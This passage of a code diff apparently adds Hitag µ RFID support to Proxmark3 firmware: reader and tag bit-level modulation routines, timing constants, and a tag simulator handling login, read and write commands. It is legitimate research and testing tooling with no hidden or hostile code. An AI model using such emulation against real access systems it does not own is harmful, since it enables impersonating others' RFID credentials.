+    SetAdcMuxFor(GPIO_MUXSEL_LOPKD);
+
+    // Configure output and enable pin that is connected to the FPGA (for modulating)
+    AT91C_BASE_PIOA->PIO_OER |= GPIO_SSC_DOUT;
+    AT91C_BASE_PIOA->PIO_PER |= GPIO_SSC_DOUT;
+
+    // Disable modulation at default, which means enable the field
+    LOW(GPIO_SSC_DOUT);
+}
+
+// Clean up and finalize Hitag operations
+void hitag_cleanup(bool ledcontrol) {
+    hitag_stop_clock();
+    set_tracing(false);
+    lf_finalize(ledcontrol);
+}
+
+// Reader functions
+static void hitag_reader_send_bit(int bit, bool ledcontrol) {
+    // Reset clock for the next bit
+    AT91C_BASE_TC0->TC_CCR = AT91C_TC_SWTRG;
+    while (AT91C_BASE_TC0->TC_CV != 0) {};
+
+    if (ledcontrol) LED_A_ON();
+
+    // Binary puls length modulation (BPLM) is used to encode the data stream
+    // This means that a transmission of a one takes longer than that of a zero
+    HIGH(GPIO_SSC_DOUT);
+
+    // Wait for 4-10 times the carrier period
+    while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_LOW) {};
+
+    LOW(GPIO_SSC_DOUT);
+
+    if (bit == 0) {
+        // Zero bit: |_-|
+        while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_0) {};
+    } else {
+        // One bit: |_--|
+        while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_1) {};
+    }
+
+    if (ledcontrol) LED_A_OFF();
+}
+
+void hitag_reader_send_frame(const uint8_t *frame, size_t frame_len, bool ledcontrol, bool send_sof) {
+    // Send SOF (Start of Frame) for Hitag µ if requested
+    if (send_sof) {
+        hitag_reader_send_bit(0, ledcontrol);
+
+        // Reset clock for the code violation
+        AT91C_BASE_TC0->TC_CCR = AT91C_TC_SWTRG;
+        while (AT91C_BASE_TC0->TC_CV != 0) {};
+
+        if (ledcontrol) LED_A_ON();
+
+        // SOF is HIGH for HITAG_T_LOW
+        HIGH(GPIO_SSC_DOUT);
+        while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_LOW) {};
+
+        // Then LOW for HITAG_T_CODE_VIOLATION
+        LOW(GPIO_SSC_DOUT);
+        while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_CODE_VIOLATION) {};
+
+        if (ledcontrol) LED_A_OFF();
+    }
+
+    // Send the content of the frame
+    for (size_t i = 0; i < frame_len; i++) {
+        hitag_reader_send_bit(TEST_BIT_MSB(frame, i), ledcontrol);
+    }
+
+    // Send EOF
+    AT91C_BASE_TC0->TC_CCR = AT91C_TC_SWTRG;
+    while (AT91C_BASE_TC0->TC_CV != 0) {};
+
+    HIGH(GPIO_SSC_DOUT);
+
+    // Wait for 4-10 times the carrier period
+    while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_LOW) {};
+
+    LOW(GPIO_SSC_DOUT);
+}
+
+void hitag_reader_receive_frame(uint8_t *rx, size_t sizeofrx, size_t *rxlen, uint32_t *resptime, bool ledcontrol,
+                                MOD modulation, int sof_bits) {
+    // Reset values for receiving frames
+    memset(rx, 0x00, sizeofrx);
+    *rxlen = 0;
+
+    int lastbit = 1;
+    bool bSkip = true;
+    uint32_t errorCount = 0;
+    bool bStarted = false;
+    uint16_t next_edge_event = AT91C_TC_LDRBS;
+    int double_speed = (modulation == AC4K || modulation == MC8K) ? 2 : 1;
+
+    uint32_t rb_i = 0;
+    uint8_t edges[160] = {0};
+
+    // Skip SOF bits
+    bool sof_received = false;
+
+    // Receive tag frame, watch for at most T0*HITAG_T_PROG_MAX periods
+    while (AT91C_BASE_TC0->TC_CV < (T0 * HITAG_T_PROG_MAX)) {
+        // Check if edge in tag modulation is detected
+        if (AT91C_BASE_TC1->TC_SR & next_edge_event) {
+            next_edge_event = next_edge_event ^ (AT91C_TC_LDRAS | AT91C_TC_LDRBS);
+
+            // only use AT91C_TC_LDRBS falling edge for now
+            if (next_edge_event == AT91C_TC_LDRBS) continue;
+
+            // Retrieve the new timing values
+            uint32_t rb = AT91C_BASE_TC1->TC_RB / T0;
+            edges[rb_i++] = rb;
+
+            // Reset timer every frame, we have to capture the last edge for timing
+            AT91C_BASE_TC0->TC_CCR = AT91C_TC_SWTRG;
+
+            if (ledcontrol) LED_B_INV();
+
+            // Capture tag frame (manchester decoding using only falling edges)
+            if (bStarted == false) {
+                if (rb >= HITAG_T_WAIT_RESP) {
+                    bStarted = true;
+
+                    // Capture tag response timestamp
+                    *resptime = TIMESTAMP;
+
+                    // We always receive a 'one' first, which has the falling edge after a half period |-_|
+                    rx[0] = 0x80;
+                    *rxlen = 1;
+                } else {
+                    errorCount++;
+                }
+            } else {
+                // Handle different modulation types
+                if (modulation == AC2K || modulation == AC4K) {
+                    // Anticollision Coding
+                    if (rb >= HITAG_T_TAG_CAPTURE_FOUR_HALF / double_speed) {
+                        // Anticollision Coding example |--__|--__| (00)
+                        lastbit = 0;
+                        // CLEAR_BIT_MSB(rx, *rxlen);
+                        (*rxlen)++;
+                    } else if (rb >= HITAG_T_TAG_CAPTURE_THREE_HALF / double_speed) {
+                        // Anticollision Coding example |-_-_|--__| (10) or |--__|-_-_| (01)
+                        lastbit = !lastbit;
+                        if (lastbit) SET_BIT_MSB(rx, *rxlen);
+                        (*rxlen)++;
+
+                        bSkip = !!lastbit;
+                    } else if (rb >= HITAG_T_TAG_CAPTURE_TWO_HALF / double_speed) {
+                        // Anticollision Coding example |-_-_| (1)
+                        if (bSkip == false) {
+                            lastbit = 1;
+                            SET_BIT_MSB(rx, *rxlen);
+                            (*rxlen)++;
+                        }
+
+                        bSkip = !bSkip;
+                    } else {
+                        // Ignore weird value, is to small to mean anything
+                        errorCount++;
+                    }
+                } else {
+                    // Manchester coding (MC4K, MC8K)
+                    if (rb >= HITAG_T_TAG_CAPTURE_FOUR_HALF / double_speed) {
+                        // Manchester coding example |-_|_-|-_| (101)
+                        // CLEAR_BIT_MSB(rx, *rxlen);
+                        (*rxlen)++;
+
+                        SET_BIT_MSB(rx, *rxlen);
+                        (*rxlen)++;
+                    } else if (rb >= HITAG_T_TAG_CAPTURE_THREE_HALF / double_speed) {
+                        // Manchester coding example |_-|...|_-|-_| (0...01)
+                        // CLEAR_BIT_MSB(rx, *rxlen);
+                        (*rxlen)++;
+
+                        // We have to skip this half period at start and add the 'one' the second time
+                        if (bSkip == false) {
+                            SET_BIT_MSB(rx, *rxlen);
+                            (*rxlen)++;
+                        }
+
+                        lastbit = !lastbit;
+                        bSkip = !bSkip;
+                    } else if (rb >= HITAG_T_TAG_CAPTURE_TWO_HALF / double_speed) {
+                        // Manchester coding example |_-|_-| (00) or |-_|-_| (11)
+                        // bit is same as last bit
+                        if (lastbit) SET_BIT_MSB(rx, *rxlen);
+                        (*rxlen)++;
+                    } else {
+                        // Ignore weird value, is to small to mean anything
+                        errorCount++;
+                    }
+                }
+
+                // Handle SOF bits
+                if (sof_received == false && *rxlen >= sof_bits) {
+                    // Check if SOF is valid (all bits should be 1)
+                    if ((rx[0] >> (8 - sof_bits)) != ((1 << sof_bits) - 1)) {
+                        if (sof_bits == 4) {
+                            sof_bits = 3;
+                            // Hitag µ is LSB first 0b110
+                            if ((rx[0] & 0xE0) != 0xC0) {
+                                DBG Dbprintf("Warning, SOF is invalid rx[0]: 0x%02X", rx[0]);
+                            }
+                        } else {
+                            DBG DbpString("Warning, not all bits of SOF are 1");
+                        }
+                    }
+
+                    *rxlen -= sof_bits;
+                    uint8_t tmp = rx[0];
+                    rx[0] = 0x00;
+                    for (size_t i = 0; i < *rxlen; i++) {
+                        if (TEST_BIT_MSB(&tmp, sof_bits + i)) SET_BIT_MSB(rx, i);
+                    }
+                    // DBG Dbprintf("after sof_bits rxlen: %d rx[0]: 0x%02X", *rxlen, rx[0]);
+                    sof_received = true;
+                }
+            }
+        }
+
+        // if we saw over 100 weird values break it probably isn't hitag...
+        if (errorCount > 100 || (*rxlen) / 8 >= sizeofrx) {
+            break;
+        }
+
+        // We can break this loop if we received the last bit from a frame
+        // max periods between 2 falling edge
+        // RTF AC64 |--__|--__| (00) 64 * T0
+        // RTF MC32 |_-|-_|_-| (010) 48 * T0
+        if (AT91C_BASE_TC1->TC_CV > (T0 * 80)) {
+            if (bStarted) {
+                break;
+            }
+        }
+    }
+
+    DBG {
+        Dbprintf("RX %i:%02X.. resptime:%i edges:", *rxlen, rx[0], *resptime);
+        Dbhexdump(rb_i, edges, false);
+    }
+}
+
+// Tag functions - depends on modulation type
+static void hitag_tag_send_bit(int bit, MOD modulation, bool ledcontrol) {
+    // Reset clock for the next bit
+    AT91C_BASE_TC0->TC_CCR = AT91C_TC_SWTRG;
+
+    if (ledcontrol) LED_A_ON();
+
+    switch (modulation) {
+        case AC2K: {
+            if (bit == 0) {
+                // AC Coding --__
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 32) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 64) {};
+            } else {
+                // AC coding -_-_
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 16) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 32) {};
+
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 48) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 64) {};
+            }
+            break;
+        }
+        case AC4K: {
+            if (bit == 0) {
+                // AC Coding --__
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_TAG_HALF_PERIOD) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * HITAG_T_TAG_FULL_PERIOD) {};
+            } else {
+                // AC coding -_-_
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 8) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 16) {};
+
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 24) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 32) {};
+            }
+            break;
+        }
+        case MC4K: {
+            if (bit == 0) {
+                // Manchester: Unloaded, then loaded |__--|
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 16) {};
+
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 32) {};
+            } else {
+                // Manchester: Loaded, then unloaded |--__|
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 16) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 32) {};
+            }
+            break;
+        }
+        case MC8K: {
+            if (bit == 0) {
+                // Manchester: Unloaded, then loaded |__--|
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 8) {};
+
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 16) {};
+            } else {
+                // Manchester: Loaded, then unloaded |--__|
+                HIGH(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 8) {};
+
+                LOW(GPIO_SSC_DOUT);
+                while (AT91C_BASE_TC0->TC_CV < T0 * 16) {};
+            }
+            break;
+        }
+    }
+
+    if (ledcontrol) LED_A_OFF();
+}
+
+void hitag_tag_receive_frame(uint8_t *rx, size_t sizeofrx, size_t *rxlen, uint32_t *start_time, bool ledcontrol, int *overflow) {
+    uint16_t next_edge_event = AT91C_TC_LDRBS;
+    uint8_t edges[160] = {0};
+    uint32_t rb_i = 0;
+
+    // Receive frame, watch for at most T0*EOF periods
+    while (AT91C_BASE_TC1->TC_CV < T0 * HITAG_T_EOF) {
+
+        // Check if edge in modulation is detected
+        if (AT91C_BASE_TC1->TC_SR & next_edge_event) {
+            next_edge_event = next_edge_event ^ (AT91C_TC_LDRAS | AT91C_TC_LDRBS);
+
+            // only use AT91C_TC_LDRBS falling edge for now
+            if (next_edge_event == AT91C_TC_LDRBS) continue;
+
+            // Retrieve the new timing values
+            uint32_t rb = AT91C_BASE_TC1->TC_RB / T0 + *overflow;
+            *overflow = 0;
+
+            edges[rb_i++] = rb;
+
+            if (ledcontrol) LED_B_INV();
+
+            // Capture reader cmd start timestamp
+            if (*start_time == 0) {
+                *start_time = TIMESTAMP - HITAG_T_LOW;
+            }
+
+            // Capture reader frame
+            if (rb >= HITAG_T_STOP) {
+                // Hitag µ SOF
+                if (*rxlen != 0 && *rxlen != 1) {
+                    // DBG DbpString("weird0?");
+                    break;
+                }
+                *rxlen = 0;
+            } else if (rb >= HITAG_T_1_MIN) {
+                // '1' bit
+                SET_BIT_MSB(rx, *rxlen);
+                (*rxlen)++;
+            } else if (rb >= HITAG_T_0_MIN) {
+                // '0' bit
+                // CLEAR_BIT_MSB(rx, *rxlen);
+                (*rxlen)++;
+            } else {
+                // Ignore weird value, is too small to mean anything
+            }
+        }
+    }
+
+    if (ledcontrol) LED_B_OFF();
+
+    DBG if (rb_i) {
+        Dbprintf("RX %i bits.. start_time:%i edges:", *rxlen, *start_time);
+        Dbhexdump(rb_i, edges, false);
+    }
+}
+
+void hitag_tag_send_frame(const uint8_t *frame, size_t frame_len, int sof_bits, MOD modulation, bool ledcontrol) {
+    // The beginning of the frame is hidden in some high level; pause until our bits will have an effect
+    AT91C_BASE_TC0->TC_CCR = AT91C_TC_SWTRG;
+    HIGH(GPIO_SSC_DOUT);
+
+    switch (modulation) {
+        case AC4K:
+        case MC8K: {
+            while (AT91C_BASE_TC0->TC_CV < T0 * 40) {}; // FADV
+            break;
+        }
+        case AC2K:
+        case MC4K: {
+            while (AT91C_BASE_TC0->TC_CV < T0 * 20) {}; // STD + ADV
+            break;
+        }
+    }
+
+    // SOF - send start of frame
+    for (size_t i = 0; i < sof_bits; i++) {
+        if (sof_bits == 4 && i == 3) {
+            // Hitag µ SOF is 110
+            hitag_tag_send_bit(0, modulation, ledcontrol);
+            break;
+        } else
+            hitag_tag_send_bit(1, modulation, ledcontrol);
+    }
+
+    // Send the content of the frame
+    for (size_t i = 0; i < frame_len; i++) {
+        hitag_tag_send_bit(TEST_BIT_MSB(frame, i), modulation, ledcontrol);
+    }
+
+    LOW(GPIO_SSC_DOUT);
+}

armsrc/hitag_common.h

@@ -0,0 +1,57 @@
+#ifndef HITAG_COMMON_H
+#define HITAG_COMMON_H
+
+#include "hitag.h"
+
+// Sam7s has several timers, we will use the source TIMER_CLOCK3 (aka AT91C_TC_CLKS_TIMER_DIV3_CLOCK)
+// TIMER_CLOCK3 = MCK/32, MCK is running at 48 MHz, Timer is running at 48MHz/32 = 1500 KHz
+// Hitag units (T0) have duration of 8 microseconds (us), which is 1/125000 per second (carrier)
+// T0 = TIMER_CLOCK3 / 125000 = 12
+
+#define T0 12
+
+#define HITAG_FRAME_LEN 20
+
+// TC0 and TC1 are 16-bit counters and will overflow after 5461 * T0
+// Ensure not to set these timings above 5461 (~43ms) when comparing without considering overflow, as they will never reach that value.
+
+#define HITAG_T_LOW 8    /* T_LOW should be 4..10 */
+#define HITAG_T_0 20     /* T[0] should be 18..22 */
+#define HITAG_T_1 28     /* T[1] should be 26..32 */
+#define HITAG_T_0_MIN 15 /* T[0] should be 18..22 */
+#define HITAG_T_1_MIN 25 /* T[1] should be 26..32 */
+#define HITAG_T_STOP 36  /* T_EOF should be > 36 */
+#define HITAG_T_CODE_VIOLATION 36 /* Hitag µ TFcv should be 34..38 */
+#define HITAG_T_EOF 80         /* T_EOF should be > 36 */
+
+#define HITAG_T_WAIT_RESP 200  /* T_wresp should be 204..212 */
+#define HITAG_T_WAIT_SC 200    /* T_wsc should be 90..5000 */
+#define HITAG_T_WAIT_FIRST 300 /* T_wfc should be 280..565 (T_ttf) */
+#define HITAG_T_PROG_MAX 750   /* T_prog should be 716..726 */
+
+#define HITAG_T_TAG_ONE_HALF_PERIOD 10
+#define HITAG_T_TAG_TWO_HALF_PERIOD 25
+#define HITAG_T_TAG_THREE_HALF_PERIOD 41
+#define HITAG_T_TAG_FOUR_HALF_PERIOD 57
+
+#define HITAG_T_TAG_HALF_PERIOD 16
+#define HITAG_T_TAG_FULL_PERIOD 32
+
+#define HITAG_T_TAG_CAPTURE_ONE_HALF 13
+#define HITAG_T_TAG_CAPTURE_TWO_HALF 25
+#define HITAG_T_TAG_CAPTURE_THREE_HALF 41
+#define HITAG_T_TAG_CAPTURE_FOUR_HALF 57
+
+extern uint16_t timestamp_high;
+#define TIMESTAMP ( (AT91C_BASE_TC2->TC_SR & AT91C_TC_COVFS) ? timestamp_high += 1 : 0, ((timestamp_high << 16) + AT91C_BASE_TC2->TC_CV) / T0)
+
+// Common hitag functions
+void hitag_setup_fpga(uint16_t conf, uint8_t threshold, bool ledcontrol);
+void hitag_cleanup(bool ledcontrol);
+void hitag_reader_send_frame(const uint8_t *frame, size_t frame_len, bool ledcontrol, bool send_sof);
+void hitag_reader_receive_frame(uint8_t *rx, size_t sizeofrx, size_t *rxlen, uint32_t *resptime, bool ledcontrol, MOD modulation,
+                                int sof_bits);
+void hitag_tag_receive_frame(uint8_t *rx, size_t sizeofrx, size_t *rxlen, uint32_t *start_time, bool ledcontrol, int *overflow);
+void hitag_tag_send_frame(const uint8_t *frame, size_t frame_len, int sof_bits, MOD modulation, bool ledcontrol);
+
+#endif

armsrc/hitagu.c

@@ -0,0 +1,897 @@
+//-----------------------------------------------------------------------------
+// Copyright (C) Proxmark3 contributors. See AUTHORS.md for details.
+//
+// This program is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// This program is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+// GNU General Public License for more details.
+//
+// See LICENSE.txt for the text of the license.
+//-----------------------------------------------------------------------------
+// Low frequency HITAG µ (micro) functions
+
+#include "hitagu.h"
+#include "hitag_common.h"
+
+#include "BigBuf.h"
+#include "appmain.h"  // tearoff_hook()
+#include "cmd.h"
+#include "commonutil.h"
+#include "crc16.h"
+#include "dbprint.h"
+#include "fpgaloader.h"
+#include "hitag2/hitag2_crypto.h"
+#include "lfadc.h"
+#include "protocols.h"
+#include "proxmark3_arm.h"
+#include "string.h"
+#include "ticks.h"
+#include "util.h"
+
+// Hitag µ specific definitions
+#define HTU_SOF_BITS 4     // Start of frame bits is always 3 for Hitag µ (110) plus 1 bit error flag
+
+MOD M = MC4K;  // Modulation type
+
+// Structure to hold the state of the Hitag µ tag
+static struct hitagU_tag tag = {
+    .pstate = HT_READY,                    // Initial state is ready
+    .max_page = HITAGU_MAX_PAGE_STANDARD,  // Default to standard version
+    .icr = 0,                              // Default ICR value
+};
+
+// Macros for managing authentication state
+#define IS_AUTHENTICATED() (tag.pstate == HT_AUTHENTICATE)
+#define SET_AUTHENTICATED() (tag.pstate = HT_AUTHENTICATE)
+#define RESET_AUTHENTICATION() (tag.pstate = HT_READY)
+
+/*
+ * Update the maximum page number based on the tag's ICR (IC Revision)
+ */
+static void update_tag_max_page_by_icr(void) {
+    // Set max_page based on ICR value
+    switch (tag.icr) {
+        case HITAGU_ICR_STANDARD:
+            tag.max_page = HITAGU_MAX_PAGE_STANDARD;
+            DBG Dbprintf("Detected standard Hitag µ (ICR=0x%02X), max page: 0x%02X", tag.icr, tag.max_page);
+            break;
+        case HITAGU_ICR_ADVANCED:
+            tag.max_page = HITAGU_MAX_PAGE_ADVANCED;
+            DBG Dbprintf("Detected Hitag µ advanced (ICR=0x%02X), max page: 0x%02X", tag.icr, tag.max_page);
+            break;
+        case HITAGU_ICR_ADVANCED_PLUS:
+            tag.max_page = HITAGU_MAX_PAGE_ADVANCED_PLUS;
+            DBG Dbprintf("Detected Hitag µ advanced+ (ICR=0x%02X), max page: 0x%02X", tag.icr, tag.max_page);
+            break;
+        case HITAGU_ICR_8265:
+            tag.max_page = HITAGU_MAX_PAGE_8265;
+            DBG Dbprintf("Detected Hitag µ 8265 (ICR=0x%02X), max page: 0x%02X", tag.icr, tag.max_page);
+            break;
+        default:
+            // Unknown ICR, use standard size as fallback
+            tag.max_page = HITAGU_MAX_PAGE_STANDARD;
+            DBG Dbprintf("Unknown Hitag µ ICR: 0x%02X, defaulting to max page: 0x%02X", tag.icr, tag.max_page);
+            break;
+    }
+}
+
+/*
+ * Update the maximum page number based on the tag's memory configuration
+ * This function checks both ICR and additional pattern-based detection
+ */
+static void update_tag_max_page(void) {
+    // First try to determine max_page from ICR
+    update_tag_max_page_by_icr();
+
+    // Additional tag type detection can be added here
+}
+
+/*
+ * Handles all commands from a reader for Hitag µ
+ * Processes flags and commands, generates appropriate responses
+ */
+static void htu_handle_reader_command(uint8_t *rx, const size_t rxlen, uint8_t *tx, size_t *txlen) {
+    // Initialize response
+    *txlen = 0;
+
+    if (rxlen < 5) {
+        return;  // Command too short
+    }
+
+    // Extract flags (5 bits) and command (6 bits if present)
+    uint8_t flags = (rx[0] >> 3) & 0x1F;
+    uint8_t command = 0;
+
+    if (rxlen >= 11) {
+        // Extract 6-bit command if present
+        command = ((rx[0] & 0x07) << 3) | ((rx[1] >> 5) & 0x07);
+    }
+
+    // Check flags
+    bool inv_flag = (flags & HITAGU_FLAG_INV);
+    bool crct_flag = (flags & HITAGU_FLAG_CRCT);
+
+    // Handle based on flags and command
+    if (inv_flag) {
+        // Inventory mode - respond with UID (48 bits)
+        *txlen = concatbits(tx, *txlen, tag.uid, 0, HITAGU_UID_SIZE * 8, true);
+    } else if (command == HITAGU_CMD_LOGIN) {
+        // Login command
+        if (rxlen >= 43) {  // 5+6+32 bits = 43 bits minimum
+            // Extract password - 32 bits after command
+            uint32_t password = 0;
+            for (int i = 0; i < 4; i++) {
+                int startBit = 11 + i * 8;  // 5+6 bits of command + i*8
+                uint8_t b = 0;
+
+                for (int j = 0; j < 8; j++) {
+                    int bitPos = startBit + j;
+                    int pos = bitPos / 8;
+                    int shift = 7 - (bitPos % 8);
+                    b |= ((rx[pos] >> shift) & 0x01) << (7 - j);
+                }
+                password |= (b << (24 - i * 8));
+            }
+
+            // Check password
+            if (password == ((tag.password[0] << 24) | (tag.password[1] << 16) | (tag.password[2] << 8) | tag.password[3])) {
+                // Set authentication state
+                SET_AUTHENTICATED();
+
+                // Send success response
+                uint8_t resp_byte = 0x01;  // Success code
+                *txlen = concatbits(tx, *txlen, &resp_byte, 0, 8, true);
+            } else {
+                // Authentication failed
+                RESET_AUTHENTICATION();
+
+                // Send failure response
+                uint8_t resp_byte = 0x00;  // Failure code
+                *txlen = concatbits(tx, *txlen, &resp_byte, 0, 8, true);
+            }
+        }
+    } else if (command == HITAGU_CMD_SELECT) {
+        // Select command
+        if (rxlen >= 59) {  // 5+6+48 bits = 59 bits minimum (48-bit UID)
+            // Extract UID to select - next 48 bits
+            uint8_t sel_uid[6] = {0};
+            for (int i = 0; i < 6; i++) {
+                int startBit = 11 + i * 8;  // 5+6 bits of command + i*8
+                uint8_t b = 0;
+
+                for (int j = 0; j < 8; j++) {
+                    int bitPos = startBit + j;
+                    int pos = bitPos / 8;
+                    int shift = 7 - (bitPos % 8);
+                    b |= ((rx[pos] >> shift) & 0x01) << (7 - j);
+                }
+                sel_uid[i] = b;
+            }
+
+            // Check if UID matches
+            if (memcmp(sel_uid, tag.uid, 6) == 0) {
+                // Selected - send response with select data
+                uint8_t resp_data[4] = {0xCA, 0x24, 0x00, 0x00};  // Standard select response
+                *txlen = concatbits(tx, *txlen, resp_data, 0, 32, true);
+            } else {
+                // UID mismatch - no response
+                *txlen = 0;
+            }
+        }
+    } else if (command == HITAGU_CMD_READ_MULTIPLE_BLOCK) {
+        // Read command
+        if (rxlen >= 19) {  // 5+6+8 bits = 19 bits minimum
+            // Extract page address - 8 bits after command
+            uint8_t page = 0;
+            for (int i = 0; i < 8; i++) {
+                int bitPos = 11 + i;  // 5+6 bits of command + i
+                int pos = bitPos / 8;
+                int shift = 7 - (bitPos % 8);
+                page |= ((rx[pos] >> shift) & 0x01) << (7 - i);
+            }
+
+            // Extract number of blocks to read if ADR flag is set
+            uint8_t read_len = 1;  // Default to 1 page
+            if ((flags & HITAGU_FLAG_ADR) && rxlen >= 27) {
+                for (int i = 0; i < 8; i++) {
+                    int bitPos = 19 + i;
+                    int pos = bitPos / 8;
+                    int shift = 7 - (bitPos % 8);
+                    if (pos < (rxlen + 7) / 8) {
+                        read_len |= ((rx[pos] >> shift) & 0x01) << (7 - i);
+                    }
+                }
+            }
+
+            // Security check: does this page require authentication?
+            bool needs_auth = false;
+            // Check if page is password-protected (e.g., config or password page)
+            if (page == HITAGU_PASSWORD_PADR) {
+                needs_auth = true;
+            }
+
+            // Check authentication for protected pages
+            if (needs_auth && !IS_AUTHENTICATED()) {
+                // Not authenticated, cannot read protected pages
+                DBG Dbprintf("Page %d requires authentication", page);
+
+                // Mark as unauthorized access
+                *txlen = 0;  // No response
+            } else {
+                // Map page address (some pages may be aliased)
+                uint8_t real_page = page;
+                if (page >= 64 && tag.max_page <= 64) {
+                    real_page = page & 0x3F;  // Pages above 64 map to 0-63
+                }
+
+                // Read requested number of pages
+                for (int i = 0; i < read_len && i < 16; i++) {  // Limit to 16 pages max
+                    uint8_t curr_page = (real_page + i) % tag.max_page;
+
+                    // Special pages
+                    if (curr_page == HITAGU_CONFIG_PADR) {
+                        // Config page
+                        *txlen = concatbits(tx, *txlen, (uint8_t *)&tag.config, 0, 32, true);
+                    } else if (curr_page == HITAGU_PASSWORD_PADR) {
+                        // Password page - only return if authenticated
+                        if (IS_AUTHENTICATED()) {
+                            *txlen = concatbits(tx, *txlen, tag.password, 0, 32, true);
+                        } else {
+                            // Return zeros if not authenticated
+                            uint8_t zeros[4] = {0};
+                            *txlen = concatbits(tx, *txlen, zeros, 0, 32, true);
+                        }
+                    } else {
+                        // Regular page
+                        *txlen = concatbits(tx, *txlen, tag.data.pages[curr_page], 0, 32, true);
+                    }
+                }
+            }
+        }
+    } else if (command == HITAGU_CMD_WRITE_SINGLE_BLOCK) {
+        // Write command
+        if (rxlen >= 51) {  // 5+6+8+32 bits = 51 bits minimum
+            // Check if authenticated
+            if (!IS_AUTHENTICATED()) {
+                DBG Dbprintf("WRITE failed: not authenticated");
+                *txlen = 0;  // No response
+            } else {
+                // Extract page address - 8 bits after command
+                uint8_t page = 0;
+                for (int i = 0; i < 8; i++) {
+                    int bitPos = 11 + i;  // 5+6 bits of command + i
+                    int pos = bitPos / 8;
+                    int shift = 7 - (bitPos % 8);
+                    page |= ((rx[pos] >> shift) & 0x01) << (7 - i);
+                }
+
+                // Extract data - 32 bits after page address
+                uint8_t data[4] = {0};
+                for (int i = 0; i < 4; i++) {
+                    for (int j = 0; j < 8; j++) {
+                        int bitPos = 19 + i * 8 + j;
+                        int pos = bitPos / 8;
+                        int shift = 7 - (bitPos % 8);
+                        if (pos < (rxlen + 7) / 8) {
+                            data[i] |= ((rx[pos] >> shift) & 0x01) << (7 - j);
+                        }
+                    }
+                }
+
+                // Map page address
+                uint8_t real_page = page;
+                if (page >= 64 && tag.max_page <= 64) {
+                    real_page = page & 0x3F;  // Pages above 64 map to 0-63
+                }
+
+                // Special pages
+                if (real_page == HITAGU_CONFIG_PADR) {
+                    // Write config
+                    memcpy(&tag.config, data, 4);
+                    DBG Dbprintf("WRITE CONFIG: %02X %02X %02X %02X", data[0], data[1], data[2], data[3]);
+                } else if (real_page == HITAGU_PASSWORD_PADR) {
+                    // Write password
+                    memcpy(tag.password, data, 4);
+                    DBG Dbprintf("WRITE PASSWORD: %02X %02X %02X %02X", data[0], data[1], data[2], data[3]);
+                } else if (real_page < tag.max_page) {
+                    // Regular page
+                    memcpy(tag.data.pages[real_page], data, 4);
+                    DBG Dbprintf("WRITE PAGE %02X: %02X %02X %02X %02X", real_page, data[0], data[1], data[2], data[3]);
+                }
+
+                // Send success acknowledgment
+                uint8_t ack = 0x01;  // Success acknowledgment
+                *txlen = concatbits(tx, *txlen, &ack, 0, 8, true);
+            }
+        }
+    } else if (command == HITAGU_CMD_SYSINFO) {
+        // System info command
+        // Prepare system info response with ICR field
+        uint8_t info[8] = {0};
+
+        // First byte: Error flag (0) + 7 reserved bits
+        info[0] = 0x00;
+
+        // Additional bytes: System Memory Block Data
+        // MSN (Manufacturer Serial Number) - example values
+        info[1] = 0x12;
+        info[2] = 0x34;
+
+        // MFC (Manufacturer Code) - example value
+        info[3] = 0x04;  // NXP
+
+        // ICR (IC Revision)
+        info[4] = tag.icr;
+
+        // Reserved bytes
+        info[5] = 0x00;
+        info[6] = 0x00;
+        info[7] = 0x00;
+
+        // Add the system info data to the response
+        *txlen = concatbits(tx, *txlen, info, 0, 64, true);
+    } else if (flags == HITAGU_CMD_STAY_QUIET) {
+        // Quiet command - no response needed
+        RESET_AUTHENTICATION();
+        *txlen = 0;
+    } else {
+        // Unknown command
+        DBG Dbprintf("Unknown command or flags: flags=%02X, cmd=%02X", flags, command);
+        *txlen = 0;  // No response
+    }
+
+    // Add CRC if requested and there is response data
+    if (crct_flag && *txlen > 0) {
+        // Calculate CRC-16/XMODEM directly from tx
+        uint16_t crc = Crc16(tx, *txlen, 0, CRC16_POLY_CCITT, false, true);
+
+        // Append CRC-16 (16 bits)
+        *txlen = concatbits(tx, *txlen, (uint8_t *)&crc, 0, 16, true);
+    }
+}
+
+/*
